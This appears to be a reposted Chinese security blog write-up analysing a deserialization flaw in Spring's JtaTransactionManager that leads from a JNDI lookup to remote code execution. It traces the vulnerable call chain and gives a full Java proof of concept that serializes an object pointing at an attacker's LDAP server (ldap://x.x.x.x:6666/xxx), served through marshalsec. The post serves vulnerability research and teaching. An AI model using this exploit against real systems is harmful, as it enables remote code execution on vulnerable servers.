Spring JtaTransactionManager 反序列化漏洞

admin 2025年6月7日14:18:05评论1 views字数 1963阅读6分32秒阅读模式

该漏洞存在于spring-tx.jar包的org.springframework.transaction.jta.JtaTransactionManager类,该类实现了Java Transaction API,主要功能是处理分布式的事务管理,其重写了readObject方法,导致反序列化时该类时产生JNDI注入的问题从而RCE。但并不是spring最基本的包,默认不使用,所以并不是所有使用了spring框架的应用都受影响,需要具体检查是否包含了spring-tx.jar包

环境搭建

通过maven下载相应的jar包即可

pom.xml

1
2
3
4
5
6
7
8
9
10
11
<dependency>
<groupId>org.springframework</groupId>
<artifactId>spring-tx</artifactId>
<version>3.1.0.RELEASE</version>
</dependency>

<dependency>
<groupId>javax.transaction</groupId>
<artifactId>jta</artifactId>
<version>1.1</version>
</dependency>

漏洞分析

org.springframework.transaction.jta.JtaTransactionManager#readObject

Spring JtaTransactionManager 反序列化漏洞

org.springframework.transaction.jta.JtaTransactionManager#initUserTransactionAndTransactionManager

Spring JtaTransactionManager 反序列化漏洞

org.springframework.transaction.jta.JtaTransactionManager#lookupUserTransaction

Spring JtaTransactionManager 反序列化漏洞

当前代码是IDEA反编译得来的,下载源码后,该方法介绍为

Look up the JTA UserTransaction in JNDI via the configured name.

Spring JtaTransactionManager 反序列化漏洞

继续跟进也会发现其实就是封装了JNDI的操作

org.springframework.jndi.JndiTemplate#lookup(java.lang.String)

Spring JtaTransactionManager 反序列化漏洞

org.springframework.jndi.JndiTemplate#createInitialContext

Spring JtaTransactionManager 反序列化漏洞

而lookup的参数userTransactionName也是可控的,那么漏洞就很显然了

漏洞复现

首先编译恶意类放于WEB服务中

Spring JtaTransactionManager 反序列化漏洞

借助marshalsec启动ldap服务并设置恶意类地址

Spring JtaTransactionManager 反序列化漏洞

最后模拟漏洞触发场景,构造恶意类并反序列化

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
import org.springframework.transaction.jta.JtaTransactionManager;
import java.io.*;

public class Test {
public static void main(String[] args) throws Exception {
JtaTransactionManager jtaTransactionManager = new JtaTransactionManager();
jtaTransactionManager.setUserTransactionName("ldap://x.x.x.x:6666/xxx");

unserialize(serialize(jtaTransactionManager));
}

public static byte[] serialize(final Object obj) throws Exception {
ByteArrayOutputStream btout = new ByteArrayOutputStream();
ObjectOutputStream objOut = new ObjectOutputStream(btout);
objOut.writeObject(obj);
return btout.toByteArray();
}
public static Object unserialize(final byte[] serialized) throws Exception {
ByteArrayInputStream btin = new ByteArrayInputStream(serialized);
ObjectInputStream objIn = new ObjectInputStream(btin);
return objIn.readObject();
}

}

参考

Spring framework deserialization RCE漏洞分析以及利用

- source: l3yx's blog

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年6月7日14:18:05
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Spring JtaTransactionManager 反序列化漏洞https://cn-sec.com/archives/3777289.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息